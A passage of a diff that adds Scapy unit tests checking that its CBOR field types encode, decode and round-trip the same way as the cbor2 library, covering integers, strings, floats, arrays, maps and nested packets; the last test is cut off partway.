+all(results) + += CBORF_NEGATIVE_INTEGER boundary values - cbor2 encode, Scapy decode +import cbor2 +from scapy.cbor.cborfields import CBORF_NEGATIVE_INTEGER +from scapy.cborpacket import CBOR_Packet + +class NIntPkt2(CBOR_Packet): + CBOR_root = CBORF_NEGATIVE_INTEGER('n', -1) + +results = [] +for val in [-1, -24, -25, -256, -257, -65536, -4294967296]: + pkt = NIntPkt2(cbor2.dumps(val)) + results.append(pkt.n.val == val) + +all(results) + += CBORF_NEGATIVE_INTEGER byte-exact comparison with cbor2 +import cbor2 +from scapy.cbor.cborfields import CBORF_NEGATIVE_INTEGER +from scapy.cborpacket import CBOR_Packet + +class NIntExact(CBOR_Packet): + CBOR_root = CBORF_NEGATIVE_INTEGER('n', -1) + +results = [] +for val in [-1, -10, -24, -25, -256, -257, -65536, -65537]: + pkt = NIntExact() + pkt.n.val = val + results.append(bytes(pkt) == cbor2.dumps(val)) + +all(results) + ++ CBORF Fields - Interop: CBORF_INTEGER with cbor2 + += CBORF_INTEGER positive values - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_INTEGER +from scapy.cborpacket import CBOR_Packet + +class IntPkt(CBOR_Packet): + CBOR_root = CBORF_INTEGER('n', 0) + +results = [] +for val in [0, 1, 42, 100, 1000, 1000000]: + pkt = IntPkt() + pkt.n.val = val + dec = cbor2.loads(bytes(pkt)) + results.append(dec == val) + +all(results) + += CBORF_INTEGER negative values - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_INTEGER +from scapy.cborpacket import CBOR_Packet + +class IntNegPkt(CBOR_Packet): + CBOR_root = CBORF_INTEGER('n', -1) + +results = [] +for val in [-1, -10, -100, -1000, -1000000]: + pkt = IntNegPkt() + pkt.n.val = val + dec = cbor2.loads(bytes(pkt)) + results.append(dec == val) + +all(results) + += CBORF_INTEGER - cbor2 encode positive and negative, Scapy decode +import cbor2 +from scapy.cbor.cborfields import CBORF_INTEGER +from scapy.cborpacket import CBOR_Packet + +class IntPkt2(CBOR_Packet): + CBOR_root = CBORF_INTEGER('n', 0) + +results = [] +for val in [0, 42, -1, -42, 255, -256, 65536, -65537]: + pkt = IntPkt2(cbor2.dumps(val)) + results.append(pkt.n.val == val) + +all(results) + ++ CBORF Fields - Interop: CBORF_BYTE_STRING with cbor2 + += CBORF_BYTE_STRING empty bytes - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_BYTE_STRING +from scapy.cborpacket import CBOR_Packet + +class BytePkt(CBOR_Packet): + CBOR_root = CBORF_BYTE_STRING('data', b'') + +pkt = BytePkt() +dec = cbor2.loads(bytes(pkt)) +dec == b'' + += CBORF_BYTE_STRING all 256 byte values - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_BYTE_STRING +from scapy.cborpacket import CBOR_Packet + +class ByteAllPkt(CBOR_Packet): + CBOR_root = CBORF_BYTE_STRING('data', b'') + +pkt = ByteAllPkt() +pkt.data.val = bytes(range(256)) +dec = cbor2.loads(bytes(pkt)) +dec == bytes(range(256)) + += CBORF_BYTE_STRING - cbor2 encode, Scapy decode +import cbor2 +from scapy.cbor.cborfields import CBORF_BYTE_STRING +from scapy.cborpacket import CBOR_Packet + +class BytePkt3(CBOR_Packet): + CBOR_root = CBORF_BYTE_STRING('data', b'') + +for raw_val in [b'', b'\xde\xad\xbe\xef', bytes(range(256))]: + pkt = BytePkt3(cbor2.dumps(raw_val)) + assert pkt.data.val == raw_val + +True + += CBORF_BYTE_STRING byte-exact comparison with cbor2 +import cbor2 +from scapy.cbor.cborfields import CBORF_BYTE_STRING +from scapy.cborpacket import CBOR_Packet + +class ByteExact(CBOR_Packet): + CBOR_root = CBORF_BYTE_STRING('data', b'') + +results = [] +for raw_val in [b'', b'\x00', b'\xff', b'\xde\xad\xbe\xef', b'hello']: + pkt = ByteExact() + pkt.data.val = raw_val + results.append(bytes(pkt) == cbor2.dumps(raw_val)) + +all(results) + ++ CBORF Fields - Interop: CBORF_TEXT_STRING with cbor2 + += CBORF_TEXT_STRING empty string - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class TextPkt(CBOR_Packet): + CBOR_root = CBORF_TEXT_STRING('txt', '') + +pkt = TextPkt() +dec = cbor2.loads(bytes(pkt)) +dec == '' + += CBORF_TEXT_STRING ASCII string - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class TextPkt2(CBOR_Packet): + CBOR_root = CBORF_TEXT_STRING('txt', '') + +pkt = TextPkt2() +pkt.txt.val = 'Hello, World!' +dec = cbor2.loads(bytes(pkt)) +dec == 'Hello, World!' + += CBORF_TEXT_STRING unicode string - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class TextUniPkt(CBOR_Packet): + CBOR_root = CBORF_TEXT_STRING('txt', '') + +pkt = TextUniPkt() +pkt.txt.val = u'Hello, \u4e16\u754c' +dec = cbor2.loads(bytes(pkt)) +dec == u'Hello, \u4e16\u754c' + += CBORF_TEXT_STRING - cbor2 encode, Scapy decode +import cbor2 +from scapy.cbor.cborfields import CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class TextPkt3(CBOR_Packet): + CBOR_root = CBORF_TEXT_STRING('txt', '') + +for s in ['', 'hello', 'Hello, World!', u'caf\u00e9', u'\u4e16\u754c']: + pkt = TextPkt3(cbor2.dumps(s)) + assert pkt.txt.val == s + +True + += CBORF_TEXT_STRING byte-exact comparison with cbor2 +import cbor2 +from scapy.cbor.cborfields import CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class TextExact(CBOR_Packet): + CBOR_root = CBORF_TEXT_STRING('txt', '') + +results = [] +for s in ['', 'a', 'hello', 'IETF', u'\u6c34']: + pkt = TextExact() + pkt.txt.val = s + results.append(bytes(pkt) == cbor2.dumps(s)) + +all(results) + ++ CBORF Fields - Interop: CBORF_BOOLEAN with cbor2 + += CBORF_BOOLEAN true - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_BOOLEAN +from scapy.cborpacket import CBOR_Packet + +class BoolPkt(CBOR_Packet): + CBOR_root = CBORF_BOOLEAN('flag', True) + +pkt = BoolPkt() +dec = cbor2.loads(bytes(pkt)) +dec is True + += CBORF_BOOLEAN false - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_BOOLEAN +from scapy.cborpacket import CBOR_Packet + +class BoolFalsePkt(CBOR_Packet): + CBOR_root = CBORF_BOOLEAN('flag', False) + +pkt = BoolFalsePkt() +dec = cbor2.loads(bytes(pkt)) +dec is False + += CBORF_BOOLEAN - cbor2 encode, Scapy decode +import cbor2 +from scapy.cbor.cborfields import CBORF_BOOLEAN +from scapy.cborpacket import CBOR_Packet + +class BoolPkt2(CBOR_Packet): + CBOR_root = CBORF_BOOLEAN('flag', False) + +pkt_true = BoolPkt2(cbor2.dumps(True)) +pkt_false = BoolPkt2(cbor2.dumps(False)) +pkt_true.flag.val is True and pkt_false.flag.val is False + += CBORF_BOOLEAN byte-exact comparison with cbor2 +import cbor2 +from scapy.cbor.cborfields import CBORF_BOOLEAN +from scapy.cborpacket import CBOR_Packet + +class BoolExactTrue(CBOR_Packet): + CBOR_root = CBORF_BOOLEAN('flag', True) + +class BoolExactFalse(CBOR_Packet): + CBOR_root = CBORF_BOOLEAN('flag', False) + +pkt_t = BoolExactTrue() +pkt_f = BoolExactFalse() +bytes(pkt_t) == cbor2.dumps(True) and bytes(pkt_f) == cbor2.dumps(False) + ++ CBORF Fields - Interop: CBORF_NULL with cbor2 + += CBORF_NULL - Scapy encode, cbor2 decode gives None +import cbor2 +from scapy.cbor.cborfields import CBORF_NULL +from scapy.cborpacket import CBOR_Packet + +class NullPkt(CBOR_Packet): + CBOR_root = CBORF_NULL('n') + +pkt = NullPkt() +dec = cbor2.loads(bytes(pkt)) +dec is None + += CBORF_NULL byte-exact comparison with cbor2 +import cbor2 +from scapy.cbor.cborfields import CBORF_NULL +from scapy.cborpacket import CBOR_Packet + +class NullExact(CBOR_Packet): + CBOR_root = CBORF_NULL('n') + +pkt = NullExact() +bytes(pkt) == cbor2.dumps(None) + += CBORF_NULL - cbor2 None encode, Scapy decode gives CBOR_NULL +import cbor2 +from scapy.cbor.cbor import CBOR_NULL +from scapy.cbor.cborfields import CBORF_NULL +from scapy.cborpacket import CBOR_Packet + +class NullPkt2(CBOR_Packet): + CBOR_root = CBORF_NULL('n') + +pkt = NullPkt2(cbor2.dumps(None)) +isinstance(pkt.n, CBOR_NULL) + ++ CBORF Fields - Interop: CBORF_FLOAT with cbor2 + += CBORF_FLOAT basic values - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_FLOAT +from scapy.cborpacket import CBOR_Packet + +class FloatPkt(CBOR_Packet): + CBOR_root = CBORF_FLOAT('f', 0.0) + +results = [] +for val in [0.0, 1.0, -1.0, 3.14159, 1e10, -2.5]: + pkt = FloatPkt() + pkt.f.val = val + dec = cbor2.loads(bytes(pkt)) + results.append(dec == val) + +all(results) + += CBORF_FLOAT special values (NaN, Inf, -Inf) - Scapy encode, cbor2 decode +import cbor2, math +from scapy.cbor.cborfields import CBORF_FLOAT +from scapy.cborpacket import CBOR_Packet + +class FloatSpecialPkt(CBOR_Packet): + CBOR_root = CBORF_FLOAT('f', 0.0) + +pkt_nan = FloatSpecialPkt() +pkt_nan.f.val = float('nan') +raw_nan = bytes(pkt_nan) +pkt_inf = FloatSpecialPkt() +pkt_inf.f.val = float('inf') +raw_inf = bytes(pkt_inf) +pkt_ninf = FloatSpecialPkt() +pkt_ninf.f.val = float('-inf') +raw_ninf = bytes(pkt_ninf) +math.isnan(cbor2.loads(raw_nan)) and math.isinf(cbor2.loads(raw_inf)) and cbor2.loads(raw_ninf) == float('-inf') + += CBORF_FLOAT special values - cbor2 encode, Scapy decode +import cbor2, math +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_FLOAT +from scapy.cborpacket import CBOR_Packet + +class FloatArrPkt(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_FLOAT('nan_val', 0.0), + CBORF_FLOAT('inf_val', 0.0), + CBORF_FLOAT('ninf_val', 0.0), + ) + +pkt = FloatArrPkt(cbor2.dumps([float('nan'), float('inf'), float('-inf')])) +math.isnan(pkt.nan_val.val) and math.isinf(pkt.inf_val.val) and pkt.ninf_val.val == float('-inf') + += CBORF_FLOAT - cbor2 encode, Scapy decode roundtrip +import cbor2 +from scapy.cbor.cborfields import CBORF_FLOAT +from scapy.cborpacket import CBOR_Packet + +class FloatPkt2(CBOR_Packet): + CBOR_root = CBORF_FLOAT('f', 0.0) + +results = [] +for val in [0.0, 1.0, -1.0, 2.5, 100.0]: + pkt = FloatPkt2(cbor2.dumps(val)) + results.append(pkt.f.val == val) + +all(results) + ++ CBORF Fields - Interop: CBORF_ARRAY with cbor2 + += CBORF_ARRAY with integer fields - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER +from scapy.cborpacket import CBOR_Packet + +class PointPkt(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('x', 10), + CBORF_INTEGER('y', 20), + CBORF_INTEGER('z', 30), + ) + +pkt = PointPkt() +dec = cbor2.loads(bytes(pkt)) +dec == [10, 20, 30] + += CBORF_ARRAY with mixed types - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_BOOLEAN +from scapy.cborpacket import CBOR_Packet + +class MixedPkt(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('id', 99), + CBORF_TEXT_STRING('label', 'test'), + CBORF_BOOLEAN('active', True), + ) + +pkt = MixedPkt() +dec = cbor2.loads(bytes(pkt)) +dec[0] == 99 and dec[1] == 'test' and dec[2] is True + += CBORF_ARRAY - cbor2 encode, Scapy decode +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class RecordPkt(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('code', 0), + CBORF_TEXT_STRING('msg', ''), + ) + +pkt = RecordPkt(cbor2.dumps([200, 'OK'])) +pkt.code.val == 200 and pkt.msg.val == 'OK' + += CBORF_ARRAY roundtrip through cbor2 - multiple encode/decode cycles +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class RTPkt(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('seq', 1), + CBORF_TEXT_STRING('data', 'payload'), + ) + +pkt = RTPkt() +raw = bytes(pkt) +cbor2_dec = cbor2.loads(raw) +re_enc = cbor2.dumps(cbor2_dec) +pkt2 = RTPkt(re_enc) +pkt2.seq.val == 1 and pkt2.data.val == 'payload' + += CBORF_ARRAY with null elements - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_NULL +from scapy.cborpacket import CBOR_Packet + +class NullArrPkt(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('id', 5), + CBORF_NULL('opt'), + ) + +pkt = NullArrPkt() +dec = cbor2.loads(bytes(pkt)) +dec[0] == 5 and dec[1] is None + ++ CBORF Fields - Interop: CBORF_ARRAY_OF with cbor2 + += CBORF_ARRAY_OF with text strings - cbor2 encode, Scapy decode +import cbor2 +from scapy.cbor.cbor import CBOR_TEXT_STRING +from scapy.cbor.cborfields import CBORF_ARRAY_OF, CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class TextListPkt(CBOR_Packet): + CBOR_root = CBORF_ARRAY_OF('items', [], CBORF_TEXT_STRING) + +pkt = TextListPkt(cbor2.dumps(['hello', 'world', 'foo'])) +len(pkt.items) == 3 and pkt.items[0].val == 'hello' and pkt.items[2].val == 'foo' + += CBORF_ARRAY_OF with text strings - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cbor import CBOR_TEXT_STRING +from scapy.cbor.cborfields import CBORF_ARRAY_OF, CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class TextListPkt2(CBOR_Packet): + CBOR_root = CBORF_ARRAY_OF('items', [], CBORF_TEXT_STRING) + +pkt = TextListPkt2() +pkt.items = [CBOR_TEXT_STRING('abc'), CBOR_TEXT_STRING('def'), CBOR_TEXT_STRING('ghi')] +dec = cbor2.loads(bytes(pkt)) +dec == ['abc', 'def', 'ghi'] + += CBORF_ARRAY_OF with text strings roundtrip through cbor2 +import cbor2 +from scapy.cbor.cbor import CBOR_TEXT_STRING +from scapy.cbor.cborfields import CBORF_ARRAY_OF, CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class TextListRT(CBOR_Packet): + CBOR_root = CBORF_ARRAY_OF('items', [], CBORF_TEXT_STRING) + +pkt = TextListRT() +pkt.items = [CBOR_TEXT_STRING('x'), CBOR_TEXT_STRING('y'), CBOR_TEXT_STRING('z')] +raw = bytes(pkt) +re_enc = cbor2.dumps(cbor2.loads(raw)) +pkt2 = TextListRT(re_enc) +len(pkt2.items) == 3 and pkt2.items[1].val == 'y' + += CBORF_ARRAY_OF with byte strings - cbor2 encode, Scapy decode +import cbor2 +from scapy.cbor.cbor import CBOR_BYTE_STRING +from scapy.cbor.cborfields import CBORF_ARRAY_OF, CBORF_BYTE_STRING +from scapy.cborpacket import CBOR_Packet + +class ByteListPkt(CBOR_Packet): + CBOR_root = CBORF_ARRAY_OF('items', [], CBORF_BYTE_STRING) + +pkt = ByteListPkt(cbor2.dumps([b'\x01\x02', b'\x03\x04', b'\x05\x06'])) +len(pkt.items) == 3 and pkt.items[0].val == b'\x01\x02' and pkt.items[2].val == b'\x05\x06' + += CBORF_ARRAY_OF with byte strings - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cbor import CBOR_BYTE_STRING +from scapy.cbor.cborfields import CBORF_ARRAY_OF, CBORF_BYTE_STRING +from scapy.cborpacket import CBOR_Packet + +class ByteListPkt2(CBOR_Packet): + CBOR_root = CBORF_ARRAY_OF('items', [], CBORF_BYTE_STRING) + +pkt = ByteListPkt2() +pkt.items = [CBOR_BYTE_STRING(b'\xaa\xbb'), CBOR_BYTE_STRING(b'\xcc\xdd')] +dec = cbor2.loads(bytes(pkt)) +dec == [b'\xaa\xbb', b'\xcc\xdd'] + += CBORF_ARRAY_OF integers - large list cbor2 roundtrip +import cbor2 +from scapy.cbor.cbor import CBOR_UNSIGNED_INTEGER +from scapy.cbor.cborfields import CBORF_ARRAY_OF, CBORF_INTEGER +from scapy.cborpacket import CBOR_Packet + +class BigIntList(CBOR_Packet): + CBOR_root = CBORF_ARRAY_OF('items', [], CBORF_INTEGER) + +cbor2_data = cbor2.dumps(list(range(50))) +pkt = BigIntList(cbor2_data) +len(pkt.items) == 50 and pkt.items[0].val == 0 and pkt.items[49].val == 49 + += CBORF_ARRAY_OF integers - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cbor import CBOR_UNSIGNED_INTEGER +from scapy.cbor.cborfields import CBORF_ARRAY_OF, CBORF_INTEGER +from scapy.cborpacket import CBOR_Packet + +class IntListPkt(CBOR_Packet): + CBOR_root = CBORF_ARRAY_OF('items', [], CBORF_INTEGER) + +pkt = IntListPkt() +pkt.items = [CBOR_UNSIGNED_INTEGER(i) for i in [10, 20, 30, 40, 50]] +dec = cbor2.loads(bytes(pkt)) +dec == [10, 20, 30, 40, 50] + ++ CBORF Fields - Interop: CBORF_MAP with cbor2 + += CBORF_MAP with text string values - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_TEXT_STRING, CBORF_INTEGER +from scapy.cborpacket import CBOR_Packet + +class HeaderPkt(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('alg', 'ES256'), + CBORF_TEXT_STRING('typ', 'JWT'), + CBORF_INTEGER('ver', 1), + ) + +pkt = HeaderPkt() +dec = cbor2.loads(bytes(pkt)) +isinstance(dec, dict) and dec.get('alg') == 'ES256' and dec.get('typ') == 'JWT' and dec.get('ver') == 1 + += CBORF_MAP - cbor2 encode, Scapy decode +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_TEXT_STRING, CBORF_INTEGER, CBORF_BOOLEAN +from scapy.cborpacket import CBOR_Packet + +class CredPkt(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('sub', ''), + CBORF_INTEGER('iat', 0), + CBORF_BOOLEAN('admin', False), + ) + +pkt = CredPkt(cbor2.dumps({'sub': 'user42', 'iat': 1700000000, 'admin': True})) +pkt.sub.val == 'user42' and pkt.iat.val == 1700000000 and pkt.admin.val is True + += CBORF_MAP roundtrip through cbor2 +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_TEXT_STRING, CBORF_BYTE_STRING, CBORF_INTEGER +from scapy.cborpacket import CBOR_Packet + +class CoseHeaderPkt(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('alg', 'ES256'), + CBORF_BYTE_STRING('kid', b'\x01\x02\x03\x04'), + CBORF_INTEGER('crit', 1), + ) + +pkt = CoseHeaderPkt() +raw = bytes(pkt) +re_enc = cbor2.dumps(cbor2.loads(raw)) +pkt2 = CoseHeaderPkt(re_enc) +pkt2.alg.val == 'ES256' and pkt2.kid.val == b'\x01\x02\x03\x04' and pkt2.crit.val == 1 + += CBORF_MAP with null value - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_INTEGER, CBORF_NULL +from scapy.cborpacket import CBOR_Packet + +class OptionalPkt(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_INTEGER('id', 7), + CBORF_NULL('optional_data'), + ) + +pkt = OptionalPkt() +dec = cbor2.loads(bytes(pkt)) +dec.get('id') == 7 and dec.get('optional_data') is None + += CBORF_MAP with boolean values roundtrip with cbor2 +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_BOOLEAN, CBORF_INTEGER, CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class FlagsPkt(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_BOOLEAN('active', True), + CBORF_BOOLEAN('verified', False), + CBORF_INTEGER('level', 3), + CBORF_TEXT_STRING('role', 'admin'), + ) + +pkt = FlagsPkt() +raw = bytes(pkt) +dec = cbor2.loads(raw) +re_enc = cbor2.dumps(dec) +pkt2 = FlagsPkt(re_enc) +pkt2.active.val is True and pkt2.verified.val is False and pkt2.level.val == 3 and pkt2.role.val == 'admin' + += CBORF_MAP skip unknown keys from cbor2 +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_TEXT_STRING, CBORF_INTEGER +from scapy.cborpacket import CBOR_Packet + +class KnownKeysPkt(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('known', 'default'), + CBORF_INTEGER('count', 0), + ) + +pkt = KnownKeysPkt(cbor2.dumps({'known': 'found', 'count': 42, 'extra': 'ignored'})) +pkt.known.val == 'found' and pkt.count.val == 42 + ++ CBORF Fields - Interop: CBOR_Packet complex structures with cbor2 + += CBOR_Packet CBORF_ARRAY with multiple field types - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_BOOLEAN +from scapy.cborpacket import CBOR_Packet + +class SensorReading(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('sensor_id', 42), + CBORF_TEXT_STRING('unit', 'fahrenheit'), + CBORF_INTEGER('value', 98), + CBORF_BOOLEAN('alarm', True), + ) + +pkt = SensorReading() +dec = cbor2.loads(bytes(pkt)) +dec[0] == 42 and dec[1] == 'fahrenheit' and dec[2] == 98 and dec[3] is True + += CBOR_Packet with CBORF_MAP multiple field types - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_BOOLEAN, CBORF_BYTE_STRING +from scapy.cborpacket import CBOR_Packet + +class DeviceInfo(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_INTEGER('id', 0), + CBORF_TEXT_STRING('label', ''), + CBORF_BOOLEAN('online', False), + CBORF_BYTE_STRING('hwaddr', b''), + ) + +pkt = DeviceInfo(cbor2.dumps({'id': 1001, 'label': 'device-01', 'online': True, 'hwaddr': b'\x00\x11\x22\x33\x44\x55'})) +dec = cbor2.loads(bytes(pkt)) +dec.get('id') == 1001 and dec.get('label') == 'device-01' and dec.get('online') is True and dec.get('hwaddr') == b'\x00\x11\x22\x33\x44\x55' + += CBOR_Packet CBORF_MAP full cbor2 roundtrip +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_BOOLEAN +from scapy.cborpacket import CBOR_Packet + +class ClaimsPkt(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('iss', ''), + CBORF_TEXT_STRING('sub', ''), + CBORF_INTEGER('exp', 0), + CBORF_BOOLEAN('admin', False), + ) + +pkt = ClaimsPkt(cbor2.dumps({'iss': 'auth.example.com', 'sub': 'user99', 'exp': 9999999, 'admin': False})) +raw = bytes(pkt) +dec = cbor2.loads(raw) +dec.get('iss') == 'auth.example.com' and dec.get('sub') == 'user99' and dec.get('exp') == 9999999 and dec.get('admin') is False + += CBOR_Packet CBORF_MAP with negative integer - cbor2 encode, Scapy decode +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_INTEGER, CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class OffsetPkt(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('name', ''), + CBORF_INTEGER('offset', 0), + CBORF_INTEGER('count', 0), + ) + +pkt = OffsetPkt(cbor2.dumps({'name': 'delta', 'offset': -1024, 'count': 512})) +pkt.name.val == 'delta' and pkt.offset.val == -1024 and pkt.count.val == 512 + ++ CBOR_Packet - nested CBORF_PACKET structures + += CBORF_PACKET three levels deep: Outer(ARRAY) -> Middle(ARRAY) -> Inner(ARRAY) +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_PACKET +from scapy.cborpacket import CBOR_Packet + +class NestInner(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('x', 0), + CBORF_INTEGER('y', 0), + ) + +class NestMiddle(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_TEXT_STRING('zone', ''), + CBORF_PACKET('point', None, NestInner), + ) + +class NestOuter(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('version', 0), + CBORF_PACKET('region', None, NestMiddle), + ) + +inner = NestInner(cbor2.dumps([30, 40])) +mid = NestMiddle() +mid.zone.val = 'north' +mid.point = inner +outer = NestOuter() +outer.version.val = 2 +outer.region = mid +raw = bytes(outer) +outer2 = NestOuter(raw) +outer2.version.val == 2 and outer2.region.zone.val == 'north' and outer2.region.point.x.val == 30 and outer2.region.point.y.val == 40 + += CBORF_PACKET three-level nesting cbor2 interop +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_PACKET +from scapy.cborpacket import CBOR_Packet + +class NestInner2(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('x', 0), + CBORF_INTEGER('y', 0), + ) + +class NestMiddle2(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_TEXT_STRING('zone', ''), + CBORF_PACKET('point', None, NestInner2), + ) + +class NestOuter2(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('version', 0), + CBORF_PACKET('region', None, NestMiddle2), + ) + +inner = NestInner2(cbor2.dumps([10, 20])) +mid = NestMiddle2() +mid.zone.val = 'south' +mid.point = inner +outer = NestOuter2() +outer.version.val = 1 +outer.region = mid +dec = cbor2.loads(bytes(outer)) +dec == [1, ['south', [10, 20]]] + += CBORF_PACKET inside CBORF_MAP: cbor2 decode matches field values +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_MAP, CBORF_PACKET +from scapy.cborpacket import CBOR_Packet + +class MapInner(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('px', 0), + CBORF_INTEGER('py', 0), + ) + +class MapWithNestedPkt(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('label', ''), + CBORF_PACKET('coords', None, MapInner), + ) + +inner = MapInner(cbor2.dumps([5, 7])) +pkt = MapWithNestedPkt() +pkt.label.val = 'origin' +pkt.coords = inner +dec = cbor2.loads(bytes(pkt)) +dec.get('label') == 'origin' and dec.get('coords') == [5, 7] + += CBORF_PACKET inside CBORF_MAP: Scapy decode roundtrip +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING, CBORF_MAP, CBORF_PACKET +from scapy.cborpacket import CBOR_Packet + +class CoordsInner(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('px', 0), + CBORF_INTEGER('py', 0), + ) + +class CoordsOuter(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('label', ''), + CBORF_PACKET('coords', None, CoordsInner), + ) + +inner = CoordsInner(cbor2.dumps([5, 7])) +pkt = CoordsOuter() +pkt.label.val = 'origin' +pkt.coords = inner +pkt2 = CoordsOuter(bytes(pkt)) +pkt2.label.val == 'origin' and pkt2.coords.px.val == 5 and pkt2.coords.py.val == 7 + += CBORF_PACKET: nested MAP-in-MAP via CBORF_PACKET (Document/Metadata) +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_TEXT_STRING, CBORF_BYTE_STRING, CBORF_INTEGER, CBORF_PACKET +from scapy.cborpacket import CBOR_Packet + +class DocMeta(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('creator', ''), + CBORF_INTEGER('version', 0), + ) + +class DocPacket(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('title', ''), + CBORF_BYTE_STRING('body', b''), + CBORF_PACKET('metadata', None, DocMeta), + ) + +meta = DocMeta() +meta.creator.val = 'alice' +meta.version.val = 3 +doc = DocPacket() +doc.title.val = 'My Document' +doc.body.val = b'hello world' +doc.metadata = meta +raw = bytes(doc) +dec = cbor2.loads(raw) +dec.get('title') == 'My Document' and dec.get('body') == b'hello world' and dec.get('metadata') == {'creator': 'alice', 'version': 3} + += CBORF_PACKET: nested MAP-in-MAP Scapy roundtrip +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_TEXT_STRING, CBORF_BYTE_STRING, CBORF_INTEGER, CBORF_PACKET +from scapy.cborpacket import CBOR_Packet + +class DocMeta2(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('creator', ''), + CBORF_INTEGER('version', 0), + ) + +class DocPacket2(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('title', ''), + 